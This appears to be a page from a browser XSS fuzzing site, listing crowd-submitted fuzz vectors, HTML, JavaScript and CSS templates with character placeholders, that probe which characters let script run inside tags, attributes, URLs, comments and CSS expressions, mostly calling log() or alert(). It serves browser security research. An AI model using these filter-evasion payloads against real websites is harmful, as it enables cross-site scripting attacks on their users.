Featured vector
IE 9.0
<script>alert(1,1</script0x32a2/)</script>
907,629 Successful fuzzes
Fuzz Vectors
Vectors not scanned by this browser
| Description | Vector | Created by |
|---|---|---|
| aaaaaaaa | <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> | @PunchyStickMeh |
| Alternatives to in attributes | <img src=# onerror*chr*"log(*num*)" > | @albinowax |
| Attribute separators | <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> | @garethheyes |
| Break out of title | <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> | @0xAli |
| Char after lt | <*chr*script>alert(*num*)</script> | @ethicalhack3r |
| Char that allows you to act as a slash in closing tag 2 | <script>log(*num*)<*chr*script></script> | @notxssninja |
| Characters allowed after ampersand in named character references | <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters allowed after asterisk in CSS comments | <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> | @garethheyes |
| Characters allowed after attribute name | `"'><img src=xxx:x onerror*chr*=log(*num*)> | @garethheyes |
| Characters allowed after colon in url | <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after colon in url (no slashes) | <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after paren rule | <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> | @garethheyes |
| Characters allowed after script | <script*chr*>log(*num*)</script> | @garethheyes |
| Characters allowed after slash in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as gt in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as h in http | <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as lt in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as s in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as slash in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as _ in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed attribute quote | "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> | @jackmasa |
| Characters allowed before a JavaScript function | "`'><script>*chr*log(*num*)</script> | @garethheyes |
| Characters allowed before CSS properties | '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> | @garethheyes |
| Characters allowed between CSS colon and expression | ABC<div style="x:*chr*expression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS expression chars 01 | ABC<div style="x:exp*chr*ression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS expression chars 02 | ABC<div style="x:expression*chr*(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS prop and expression | ABC<div style="x*chr*expression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between slashes | <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed between tag and attribute | <script*chr*type="text/javascript">log(*num*);</script> | @0xAli |
| Characters allowed for padding in a data URI 002 | <script src="data:*chr*,log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 003 | <script src="data:text/plain*chr*log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 001 | <iframe src="vbs:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 002 | <iframe src="vbscript:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters before img | "'`><*chr*img src=xxx:x onerror=log(*num*)> | @garethheyes |
| Characters before rgb | <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> | @garethheyes |
| Characters before script | '`"><*chr*script>log(*num*)</script> | @garethheyes |
| Characters between rgb | <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> | @garethheyes |
| Characters breaking CSS strings allowing expression | "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters breaking JavaScript Regex delimiter | "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> | @0x6D6172696F |
| Characters eating backslash in javascript string | <script>if("x\*chr*".length==1) { log(*num*);}</script> | @mhswende |
| Characters eating backslash in javascript string 2 | <script>if("x\*chr*".length==2) { log(*num*);}</script> | @mhswende |
| Characters ending CSS values allowing expressions | "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters ending HTML closing tags (HTML4) | <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> | @0x6D6172696F |
| Characters escaping JS comment delimiters 001 | <script>/* **chr*/log(*num*)// */</script> | @0x6D6172696F |
| Characters ignored in html event handler name | <img src=x on*chr*Error="javascript:log(*num*)"/> | @mhswende |
| Characters ignored in Javascript function call | "`'><script>lo*chr*g(*num*)</script> | @mhswende |
| Characters ignored inside javascript string v2 | <script>if("x*chr*x" == "xx") { log(*num*);}</script> | @mhswende |
| Characters in script inside XML elements 001 | <p><svg><script>*chr*log(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 002 | <p><svg><script>l*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 003 | <p><svg><script>*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters not encoded by encodeURI | <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> | @shafigullin |
| Characters not encoded by encodeURIComponent | <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> | @shafigullin |
| Characters separating attributes without quotes | <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> | @garethheyes |
| Characters separating attributes without quotes after hash | <img src=xx:xx#*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters syntactically equivalent to colon in a URI | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters syntactically equivalent to single quote in HTML attributes | `"'><img src='#*chr* onerror=log(*num*)> | @_cweb |
| Characters that are new lines | <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Characters that are spaces | <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Characters that break out of script variables | <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> | @garethheyes |
| Characters that close a HTML comment 002 | <!--*chr*<img src=xxx:x onerror=log(*num*)> --> | @0x6D6172696F |
| Characters that close a HTML comment 3 | --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> | @DOMXss |
| Characters that close a quote | <script charset="*chr*>log(*num*)</script> | @0xAli |
| Characters that close HTML tags | <script>log(*num*)</script*chr* | @0x6D6172696F |
| Characters that close JS Comments | '"`><script>/* **chr*log(*num*)// */</script> | @garethheyes |
| Characters that trigger a new attr after new line | <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters to end script tag via JavaScript regex 001 | <script>log(*num*,1</script*chr*/)</script> | @0x6D6172696F |
| Characters to end script tag via JavaScript regex 002 | <script>log(*num*,1</script*chr*//)</script> | @0x6D6172696F |
| Characters to separate class names in class attributes | <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> | @0x6D6172696F |
| Characters trimmed by trim | <script> if ('*chr*'.trim() === '') { log(*num*); } </script> | @shafigullin |
| Characters which break attributes without quotes | <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> | @shafigullin |
| determine any chars can go between the onerror attributes | <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> | @MisterJyu |
| Determine what character can be at the end of the javascript but before the colon | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> | @MisterJyu |
| Determine what character can replace in end tags | <script>log(*num*)<*chr*script> | @MisterJyu |
| determine what characters can be inside a script tag | "`'><sc*chr*ript>log(*num*)</sc*chr*ript> | @MisterJyu |
| Entity character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Escape from attribute a closing tag | <a href="*chr*><script>log(*num*)</script>" /> | @shafigullin |
| Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket | <body> §iframe onload=confirm(/xss/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* | @secalert |
| foobar | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* | @Sidhpurwala |
| Hex characters allowed after asterisk in CSS comments | <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> | @garethheyes |
| JS in img src for selfxss | <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> | @ethicalhack3r |
| NULL Characters inside JavaScript properties | `'"><script>window['log*chr*'](*num*)</script> | @garethheyes |
| Opening paren expression check | <div style="xss:expression(logChr*chr**num*))">test</div> | @garethheyes |
| prime browser | <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> | @thetestmanager |
| Quoteless attributes breaker | <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> | @garethheyes |
| Replacement for greater and less than signs | *chr*script*chr alert(1) *chr**chr*script*chr | @MisterJyu |
| Replacement for greater and less than signs (revised) | *chr*script*chr* log(*num*) *chr**chr*script*chr | @MisterJyu |
| Replacement for greater than sign | *chr*script>log(*num*)</script> | @mhswende |
| Single character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Single quote break | <script charset='*chr*>log(*num*)</script> | @0xAli |
| Space characters in RegExp | <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> | @shafigullin |
| Valid characters after expression | <div style="xss:expression(logChr(*num*))*chr*junk"></div> | @garethheyes |
| Valid characters after expression 2 | <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> | @garethheyes |
| Valid characters after expression 3 | <div style="xss:expression(logChr(*num*))'*chr*junk"></div> | @garethheyes |
| Valid characters after expression 4 | <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> | @garethheyes |
All vectors
| Description | Vector | Created by |
|---|---|---|
| aaaaaaaa | <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> | @PunchyStickMeh |
| Alternatives to in attributes | <img src=# onerror*chr*"log(*num*)" > | @albinowax |
| Array variables | <script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Attribute separators | <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> | @garethheyes |
| Break out of title | <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> | @0xAli |
| Char after lt | <*chr*script>alert(*num*)</script> | @ethicalhack3r |
| Char that allows you to act as a slash in closing tag 2 | <script>log(*num*)<*chr*script></script> | @notxssninja |
| Character between lt and slash in closing tag | <script>log(*num*)<*chr*/script> | @shafigullin |
| Characters allowed after ampersand in named character references | <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters allowed after asterisk in CSS comments | <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> | @garethheyes |
| Characters allowed after attribute name | `"'><img src=xxx:x onerror*chr*=log(*num*)> | @garethheyes |
| Characters allowed after colon in url | <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after colon in url (no slashes) | <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after paren rule | <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> | @garethheyes |
| Characters allowed after script | <script*chr*>log(*num*)</script> | @garethheyes |
| Characters allowed after slash in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after uri host | "`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/> | @jackmasa |
| Characters allowed as gt in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as h in http | <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as lt in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as s in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as slash in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as _ in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed attribute quote | "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> | @jackmasa |
| Characters allowed before a JavaScript function | "`'><script>*chr*log(*num*)</script> | @garethheyes |
| Characters allowed before attribute name | `"'><img src=xxx:x *chr*onerror=log(*num*)> | @garethheyes |
| Characters allowed before colon in js url | <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed before CSS properties | '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> | @garethheyes |
| Characters allowed before paren | <div id="fuzzelement*num*" style="color:rgb*chr*(0,0,0);"></div> | @garethheyes |
| Characters allowed before protocol in js url | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed between CSS colon and expression | ABC<div style="x:*chr*expression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS expression chars 01 | ABC<div style="x:exp*chr*ression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS expression chars 02 | ABC<div style="x:expression*chr*(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS prop and expression | ABC<div style="x*chr*expression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between slashes | <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed between tag and attribute | <script*chr*type="text/javascript">log(*num*);</script> | @0xAli |
| Characters allowed for padding in a data URI 001 | <script src="data:text/plain,lo*chr*g(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 002 | <script src="data:*chr*,log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 003 | <script src="data:text/plain*chr*log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 001 | <iframe src="vbs:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 002 | <iframe src="vbscript:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters before img | "'`><*chr*img src=xxx:x onerror=log(*num*)> | @garethheyes |
| Characters before paren in Javascript call | "'`><script>log*chr*(*num*)</script> | @garethheyes |
| Characters before rgb | <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> | @garethheyes |
| Characters before script | '`"><*chr*script>log(*num*)</script> | @garethheyes |
| Characters between rgb | <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> | @garethheyes |
| Characters breaking CSS strings allowing expression | "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Characters breaking JavaScript Regex delimiter | "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> | @0x6D6172696F |
| Characters consuming backslashes and breaking JS strings | <script>a='abc\*chr*\';log(*num*)//def';</script> | @0x6D6172696F |
| Characters eating backslash in javascript string | <script>if("x\*chr*".length==1) { log(*num*);}</script> | @mhswende |
| Characters eating backslash in javascript string 2 | <script>if("x\*chr*".length==2) { log(*num*);}</script> | @mhswende |
| Characters ending CSS values allowing expressions | "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters ending HTML closing tags (HTML4) | <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> | @0x6D6172696F |
| Characters escaping JS comment delimiters 001 | <script>/* **chr*/log(*num*)// */</script> | @0x6D6172696F |
| Characters ignored in html event handler name | <img src=x on*chr*Error="javascript:log(*num*)"/> | @mhswende |
| Characters ignored in Javascript function call | "`'><script>lo*chr*g(*num*)</script> | @mhswende |
| Characters ignored inside javascript string v2 | <script>if("x*chr*x" == "xx") { log(*num*);}</script> | @mhswende |
| Characters in between protocol in js url | <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters in script inside XML elements 001 | <p><svg><script>*chr*log(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 002 | <p><svg><script>l*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 003 | <p><svg><script>*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 004 | "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> | @0x6D6172696F |
| Characters not encoded by encodeURI | <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> | @shafigullin |
| Characters not encoded by encodeURIComponent | <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> | @shafigullin |
| Characters separating attributes without quotes | <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> | @garethheyes |
| Characters separating attributes without quotes after hash | <img src=xx:xx#*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters syntactically equivalent to colon in a URI | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters syntactically equivalent to single quote in HTML attributes | `"'><img src='#*chr* onerror=log(*num*)> | @_cweb |
| Characters that are new lines | <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Characters that are spaces | <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Characters that break out of script variables | <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> | @garethheyes |
| Characters that close a HTML comment | --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> | @garethheyes |
| Characters that close a HTML comment 002 | <!--*chr*<img src=xxx:x onerror=log(*num*)> --> | @0x6D6172696F |
| Characters that close a HTML comment 3 | --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> | @DOMXss |
| Characters that close a quote | <script charset="*chr*>log(*num*)</script> | @0xAli |
| Characters that close HTML tags | <script>log(*num*)</script*chr* | @0x6D6172696F |
| Characters that close JS Comments | '"`><script>/* **chr*log(*num*)// */</script> | @garethheyes |
| Characters that trigger a new attr after new line | <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters to end script tag via JavaScript regex 001 | <script>log(*num*,1</script*chr*/)</script> | @0x6D6172696F |
| Characters to end script tag via JavaScript regex 002 | <script>log(*num*,1</script*chr*//)</script> | @0x6D6172696F |
| Characters to separate class names in class attributes | <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> | @0x6D6172696F |
| Characters trimmed by trim | <script> if ('*chr*'.trim() === '') { log(*num*); } </script> | @shafigullin |
| Characters which break attributes without quotes | <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> | @shafigullin |
| determine any chars can go between the onerror attributes | <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> | @MisterJyu |
| Determine what character can be at the end of the javascript but before the colon | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> | @MisterJyu |
| Determine what character can replace in end tags | <script>log(*num*)<*chr*script> | @MisterJyu |
| determine what characters can be inside a script tag | "`'><sc*chr*ript>log(*num*)</sc*chr*ript> | @MisterJyu |
| Document body variables | <script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Document variables | <script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script> | @garethheyes |
| Does this browser support e4x | <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> | @garethheyes |
| Entity character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Escape from attribute a closing tag | <a href="*chr*><script>log(*num*)</script>" /> | @shafigullin |
| Events in tags with src or href that execute javascript | <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
| Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket | <body> §iframe onload=confirm(/xss/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* | @secalert |
| foobar | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* | @Sidhpurwala |
| Function variables | <script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Hex characters allowed after asterisk in CSS comments | <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> | @garethheyes |
| Iframe contentDocument properties | <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> | @garethheyes |
| Iframe contentWindow properties | <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> | @garethheyes |
| JS in img src for selfxss | <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> | @ethicalhack3r |
| NULL Characters inside JavaScript properties | `'"><script>window['log*chr*'](*num*)</script> | @garethheyes |
| Number variables | <script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Object variables | <script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Opening paren expression check | <div style="xss:expression(logChr*chr**num*))">test</div> | @garethheyes |
| prime browser | <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> | @thetestmanager |
| Quoteless attributes breaker | <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> | @garethheyes |
| Regexp variables | <script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Replacement for greater and less than signs | *chr*script*chr alert(1) *chr**chr*script*chr | @MisterJyu |
| Replacement for greater and less than signs (revised) | *chr*script*chr* log(*num*) *chr**chr*script*chr | @MisterJyu |
| Replacement for greater than sign | *chr*script>log(*num*)</script> | @mhswende |
| Single character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Single quote break | <script charset='*chr*>log(*num*)</script> | @0xAli |
| Space characters in RegExp | <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> | @shafigullin |
| String variables | <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Tags and events that execute javascript | <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> | @garethheyes |
| Tags and events that execute javascript 2 | <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
| Tags that execute onerror | <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> | @garethheyes |
| Unicode sequences generating illegitimate ASCII | <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> | @0x6D6172696F |
| Valid characters after expression | <div style="xss:expression(logChr(*num*))*chr*junk"></div> | @garethheyes |
| Valid characters after expression 2 | <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> | @garethheyes |
| Valid characters after expression 3 | <div style="xss:expression(logChr(*num*))'*chr*junk"></div> | @garethheyes |
| Valid characters after expression 4 | <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> | @garethheyes |
| Window variables | <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |